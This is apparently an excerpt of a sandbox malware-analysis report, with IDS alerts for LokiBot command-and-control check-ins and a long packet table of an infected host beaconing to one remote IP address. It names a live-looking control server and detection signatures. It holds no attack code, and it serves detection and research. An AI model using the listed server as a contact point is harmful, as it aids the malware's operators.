                    01/14/22-07:16:57.010126TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.2.4104.223.93.105
                    01/14/22-07:16:58.361672TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988480192.168.2.4104.223.93.105
                    01/14/22-07:16:58.361672TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988480192.168.2.4104.223.93.105
                    01/14/22-07:16:58.361672TCP2025381ET TROJAN LokiBot Checkin4988480192.168.2.4104.223.93.105
                    01/14/22-07:16:58.361672TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988480192.168.2.4104.223.93.105
                    01/14/22-07:16:59.960262TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.2.4104.223.93.105
                    01/14/22-07:16:59.960262TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.2.4104.223.93.105
                    01/14/22-07:16:59.960262TCP2025381ET TROJAN LokiBot Checkin4988580192.168.2.4104.223.93.105
                    01/14/22-07:16:59.960262TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.2.4104.223.93.105
                    01/14/22-07:17:01.212523TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988680192.168.2.4104.223.93.105
                    01/14/22-07:17:01.212523TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988680192.168.2.4104.223.93.105
                    01/14/22-07:17:01.212523TCP2025381ET TROJAN LokiBot Checkin4988680192.168.2.4104.223.93.105
                    01/14/22-07:17:01.212523TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988680192.168.2.4104.223.93.105
                    01/14/22-07:17:02.582056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988780192.168.2.4104.223.93.105
                    01/14/22-07:17:02.582056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988780192.168.2.4104.223.93.105
                    01/14/22-07:17:02.582056TCP2025381ET TROJAN LokiBot Checkin4988780192.168.2.4104.223.93.105
                    01/14/22-07:17:02.582056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988780192.168.2.4104.223.93.105
                    01/14/22-07:17:03.930333TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988880192.168.2.4104.223.93.105
                    01/14/22-07:17:03.930333TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988880192.168.2.4104.223.93.105
                    01/14/22-07:17:03.930333TCP2025381ET TROJAN LokiBot Checkin4988880192.168.2.4104.223.93.105
                    01/14/22-07:17:03.930333TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988880192.168.2.4104.223.93.105
                    01/14/22-07:17:05.232616TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988980192.168.2.4104.223.93.105
                    01/14/22-07:17:05.232616TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988980192.168.2.4104.223.93.105
                    01/14/22-07:17:05.232616TCP2025381ET TROJAN LokiBot Checkin4988980192.168.2.4104.223.93.105
                    01/14/22-07:17:05.232616TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988980192.168.2.4104.223.93.105
                    01/14/22-07:17:06.577783TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.2.4104.223.93.105
                    01/14/22-07:17:06.577783TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.2.4104.223.93.105
                    01/14/22-07:17:06.577783TCP2025381ET TROJAN LokiBot Checkin4989080192.168.2.4104.223.93.105
                    01/14/22-07:17:06.577783TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.2.4104.223.93.105
                    01/14/22-07:17:07.881860TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989180192.168.2.4104.223.93.105
                    01/14/22-07:17:07.881860TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989180192.168.2.4104.223.93.105
                    01/14/22-07:17:07.881860TCP2025381ET TROJAN LokiBot Checkin4989180192.168.2.4104.223.93.105
                    01/14/22-07:17:07.881860TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989180192.168.2.4104.223.93.105
                    01/14/22-07:17:09.745173TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.2.4104.223.93.105
                    01/14/22-07:17:09.745173TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.2.4104.223.93.105
                    01/14/22-07:17:09.745173TCP2025381ET TROJAN LokiBot Checkin4989280192.168.2.4104.223.93.105
                    01/14/22-07:17:09.745173TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.2.4104.223.93.105
                    01/14/22-07:17:11.929100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989380192.168.2.4104.223.93.105
                    01/14/22-07:17:11.929100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989380192.168.2.4104.223.93.105
                    01/14/22-07:17:11.929100TCP2025381ET TROJAN LokiBot Checkin4989380192.168.2.4104.223.93.105
                    01/14/22-07:17:11.929100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989380192.168.2.4104.223.93.105

                    Network Port Distribution

                    TCP Packets

                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Jan 14, 2022 07:15:18.650209904 CET4976880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:18.774828911 CET8049768104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:19.537019014 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:19.691287994 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:19.692826033 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:19.695573092 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:19.846610069 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:19.846723080 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:20.007998943 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:20.016736984 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:20.016784906 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:20.016962051 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:20.017034054 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:20.141881943 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.196603060 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.319559097 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.319654942 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.323362112 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.445976973 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.446059942 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.569977999 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.577928066 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.578051090 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.578094006 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.578141928 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.728550911 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.232184887 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.356343985 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.356417894 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.359164000 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.483490944 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.483581066 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.607997894 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.616121054 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.616225004 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.616311073 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.616329908 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.740901947 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:25.662341118 CET4977280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:25.805389881 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:25.805676937 CET4977280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:25.808697939 CET4977280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:25.954987049 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:25.955164909 CET4977280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:26.107965946 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:26.114744902 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:26.114762068 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:26.114911079 CET4977280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:26.114974022 CET4977280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:26.441430092 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:27.466988087 CET4977380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:27.593509912 CET8049773104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:27.593699932 CET4977380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:27.597120047 CET4977380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:27.721062899 CET8049773104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:27.721211910 CET4977380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:27.845391989 CET8049773104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:27.853188038 CET8049773104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:27.853257895 CET8049773104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:27.853420973 CET4977380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:27.853492975 CET4977380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:27.978502989 CET8049773104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:28.870106936 CET4977480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:28.994477987 CET8049774104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:28.994577885 CET4977480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:28.997591972 CET4977480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:29.121929884 CET8049774104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:29.122049093 CET4977480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:29.246237040 CET8049774104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:29.253197908 CET8049774104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:29.253262043 CET8049774104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:29.253360987 CET4977480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:29.253465891 CET4977480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:29.378015995 CET8049774104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:30.323822021 CET4977580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:30.446624994 CET8049775104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:30.446856976 CET4977580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:30.454418898 CET4977580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:30.577044010 CET8049775104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:30.577229977 CET4977580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:30.699785948 CET8049775104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:30.710796118 CET8049775104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:30.710833073 CET8049775104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:30.710966110 CET4977580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:30.711047888 CET4977580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:30.834295988 CET8049775104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:31.692822933 CET4977680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:31.815315008 CET8049776104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:31.815468073 CET4977680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:31.824330091 CET4977680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:31.946660042 CET8049776104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:31.946741104 CET4977680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:32.069384098 CET8049776104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:32.075763941 CET8049776104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:32.075810909 CET8049776104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:32.076026917 CET4977680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:32.076072931 CET4977680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:32.198952913 CET8049776104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:32.974442005 CET4977780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:33.097385883 CET8049777104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:33.097531080 CET4977780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:33.100122929 CET4977780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:33.222511053 CET8049777104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:33.222616911 CET4977780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:33.345293999 CET8049777104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:33.355024099 CET8049777104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:33.355097055 CET8049777104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:33.355202913 CET4977780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:33.355246067 CET4977780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:33.478617907 CET8049777104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:35.267332077 CET4977880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:35.391622066 CET8049778104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:35.391765118 CET4977880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:35.394366026 CET4977880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:35.519946098 CET8049778104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:35.520056009 CET4977880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:35.644304037 CET8049778104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:35.667382956 CET8049778104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:35.667426109 CET8049778104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:35.667565107 CET4977880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:35.791630030 CET8049778104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:37.655143976 CET4978180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:37.777503967 CET8049781104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:37.777637959 CET4978180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:37.781119108 CET4978180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:37.903722048 CET8049781104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:37.903804064 CET4978180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:38.026352882 CET8049781104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:38.033628941 CET8049781104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:38.033668041 CET8049781104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:38.033746958 CET4978180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:38.034060955 CET4978180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:38.156929016 CET8049781104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:40.185220003 CET4978280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:40.337157965 CET8049782104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:40.337266922 CET4978280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:40.339952946 CET4978280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:40.463884115 CET8049782104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:40.463958979 CET4978280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:40.597522974 CET8049782104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:40.607796907 CET8049782104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:40.607841015 CET8049782104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:40.607896090 CET4978280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:40.607927084 CET4978280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:40.734819889 CET8049782104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:43.084664106 CET4978380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:43.207230091 CET8049783104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:43.207324028 CET4978380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:43.210043907 CET4978380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:43.332628012 CET8049783104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:43.332705021 CET4978380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:43.455331087 CET8049783104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:43.464898109 CET8049783104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:43.464939117 CET8049783104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:43.465063095 CET4978380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:43.465147972 CET4978380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:43.588347912 CET8049783104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:44.559092999 CET4978480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:44.681673050 CET8049784104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:44.681782961 CET4978480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:44.685173988 CET4978480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:44.809073925 CET8049784104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:44.809154034 CET4978480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:44.932276964 CET8049784104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:44.943876982 CET8049784104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:44.943921089 CET8049784104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:44.944129944 CET4978480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:44.944184065 CET4978480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:45.069294930 CET8049784104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:46.152893066 CET4978580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:46.276901960 CET8049785104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:46.277021885 CET4978580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:46.279601097 CET4978580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:46.403703928 CET8049785104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:46.403915882 CET4978580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:46.528119087 CET8049785104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:46.535479069 CET8049785104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:46.535547972 CET8049785104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:46.535703897 CET4978580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:46.535804033 CET4978580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:46.660327911 CET8049785104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:48.549921989 CET4978680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:48.674393892 CET8049786104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:48.674551010 CET4978680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:48.680702925 CET4978680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:48.805067062 CET8049786104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:48.805205107 CET4978680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:48.929606915 CET8049786104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:48.940790892 CET8049786104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:48.940834999 CET8049786104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:48.940923929 CET4978680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:48.940970898 CET4978680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:49.066169024 CET8049786104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:51.153254986 CET4978780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:51.275723934 CET8049787104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:51.275877953 CET4978780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:51.278645992 CET4978780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:51.496124983 CET8049787104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:51.496203899 CET4978780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:51.711863995 CET8049787104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:51.711889029 CET8049787104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:51.711901903 CET8049787104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:51.711961031 CET4978780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:51.712032080 CET4978780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:51.903575897 CET8049787104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:52.782591105 CET4978880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:52.907073021 CET8049788104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:52.907212019 CET4978880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:52.910922050 CET4978880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:53.033756971 CET8049788104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:53.033909082 CET4978880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:53.156723976 CET8049788104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:53.164037943 CET8049788104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:53.164153099 CET8049788104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:53.164268017 CET4978880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:53.164318085 CET4978880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:53.300776958 CET8049788104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:54.256967068 CET4978980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:54.381253958 CET8049789104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:54.381366968 CET4978980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:54.384953022 CET4978980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:54.510581970 CET8049789104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:54.510684967 CET4978980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:54.634829044 CET8049789104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:54.642054081 CET8049789104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:54.642081022 CET8049789104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:54.642183065 CET4978980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:54.642204046 CET4978980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:54.773616076 CET8049789104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:56.277034998 CET4979080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:56.401386023 CET8049790104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:56.401492119 CET4979080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:56.404035091 CET4979080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:56.530777931 CET8049790104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:56.530853033 CET4979080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:56.680429935 CET8049790104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:56.687561035 CET8049790104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:56.687607050 CET8049790104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:56.687753916 CET4979080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:56.687803030 CET4979080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:56.812426090 CET8049790104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:58.745915890 CET4979180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:58.870275021 CET8049791104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:58.870400906 CET4979180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:58.873327017 CET4979180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:58.997723103 CET8049791104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:58.997903109 CET4979180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:59.122108936 CET8049791104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:59.129765034 CET8049791104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:59.129796028 CET8049791104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:59.129918098 CET4979180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:59.129978895 CET4979180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:59.254667044 CET8049791104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:01.502743006 CET4979280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:01.625967979 CET8049792104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:01.628447056 CET4979280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:01.632257938 CET4979280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:01.756519079 CET8049792104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:01.756613016 CET4979280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:02.004942894 CET8049792104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:02.004981041 CET8049792104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:02.005002022 CET8049792104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:02.005055904 CET4979280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:02.005124092 CET4979280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:02.147258043 CET8049792104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:03.149904013 CET4979380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:03.272480965 CET8049793104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:03.272602081 CET4979380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:03.275393009 CET4979380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:03.397806883 CET8049793104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:03.397876978 CET4979380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:03.520497084 CET8049793104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:03.527699947 CET8049793104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:03.527745962 CET8049793104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:03.527869940 CET4979380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:03.527929068 CET4979380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:03.651561975 CET8049793104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:04.394910097 CET4979480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:04.518780947 CET8049794104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:04.518870115 CET4979480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:04.521631956 CET4979480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:04.644134045 CET8049794104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:04.644192934 CET4979480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:04.766757011 CET8049794104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:04.775456905 CET8049794104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:04.775523901 CET8049794104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:04.775590897 CET4979480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:04.775629997 CET4979480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:04.898650885 CET8049794104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:05.796005011 CET4979580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:05.918694973 CET8049795104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:05.918823957 CET4979580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:05.921415091 CET4979580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:06.043883085 CET8049795104.223.93.105192.168.2.4
